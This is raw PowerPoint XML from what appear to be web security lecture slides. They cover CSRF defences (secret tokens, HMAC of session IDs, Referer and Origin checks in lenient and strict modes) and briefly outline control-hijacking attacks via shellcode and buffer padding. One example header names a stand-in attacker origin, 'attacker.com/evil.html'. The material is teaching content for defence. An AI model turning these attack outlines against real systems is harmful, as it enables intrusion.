        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1466850" y="3943350"/>
            <a:ext cx="1524000" cy="721895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86027" name="Picture 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="1962933"/>
            <a:ext cx="800100" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3354387" y="4075697"/>
            <a:ext cx="5405438" cy="457200"/>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dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>www.facebook.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>home.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="6553200"/>
            <a:ext cx="5764657" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>* Referrer is misspelled as “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” in HTTP header field</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1466850" y="5642394"/>
            <a:ext cx="1524000" cy="721895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3354387" y="5774741"/>
            <a:ext cx="5405438" cy="457200"/>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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Origin: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>http://www.facebook.com/home.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Multiply 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="3204777"/>
            <a:ext cx="7924800" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">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3" name="Rounded Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2228850" y="3939292"/>
            <a:ext cx="5791200" cy="51922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r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Not designed for CSRF Protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1079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0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457200" y="274638"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Secret Token Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87043" name="Content Placeholder 4" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="4144963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Requests include a hard-to-guess secret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Unguessability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t> substitutes for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>unforgeability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Variations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Session identifier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Session-independent token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Session-dependent token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>HMAC of session identifier</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="87045" name="Picture 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7543800" y="465138"/>
            <a:ext cx="800100" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1869281" y="1295400"/>
            <a:ext cx="5405438" cy="457200"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>&lt;input type=hidden value=23a3af01b&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402931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Hijacks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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">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82727139"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="933450" y="2758901"/>
          <a:ext cx="7277100" cy="518160"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3962400"/>
                <a:gridCol w="2209800"/>
                <a:gridCol w="1104900"/>
              </a:tblGrid>
              <a:tr h="367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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>shellcode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t> (aka payload)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Consolas"/>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padding</a:t>
                      </a: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latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Arc 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1028700" y="2329313"/>
            <a:ext cx="6591300" cy="883604"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7758"/>
              <a:gd name="adj2" fmla="val 1078451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latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3276601"/>
            <a:ext cx="8229600" cy="609599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="292100" indent="-292100" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="635000" indent="-292100" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst/>
              <a:defRPr sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1320800" indent="-177800" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>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b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>computation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>                     +                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4114800"/>
            <a:ext cx="8229600" cy="2011363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allow attacker ability to run arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Install malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Steal secrets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Send spam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="353593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457200" y="152400"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Referrer Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Content Placeholder 4" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2027237"/>
            <a:ext cx="8229600" cy="4449763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP Origin header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009446"/>
                </a:solidFill>
                <a:latin typeface="Zapf Dingbats"/>
                <a:ea typeface="Zapf Dingbats"/>
                <a:cs typeface="Zapf Dingbats"/>
                <a:sym typeface="Zapf Dingbats"/>
              </a:rPr>
              <a:t>✓</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Wingdings"/>
                <a:ea typeface="Wingdings"/>
                <a:cs typeface="Wingdings"/>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Origin: http://www.facebook.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Zapf Dingbats"/>
                <a:ea typeface="Zapf Dingbats"/>
                <a:cs typeface="Zapf Dingbats"/>
                <a:sym typeface="Zapf Dingbats"/>
              </a:rPr>
              <a:t>✗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Origin: http://www.attacker.com/evil.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="ＭＳ ゴシック"/>
                <a:ea typeface="ＭＳ ゴシック"/>
                <a:cs typeface="ＭＳ ゴシック"/>
              </a:rPr>
              <a:t>☐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   Origin: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rounded Rectangular Callout 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231900" y="4694237"/>
            <a:ext cx="6705600" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -30473"/>
              <a:gd name="adj2" fmla="val -105357"/>
              <a:gd name="adj3" fmla="val 16667"/>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r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lenient: Accept when not present (insecure)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strict: Don’t accept when not present (secure)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7124700" y="362953"/>
            <a:ext cx="1524000" cy="721895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="1570037"/>
            <a:ext cx="5405438" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="round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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Origin: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>http://www.facebook.com/home.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
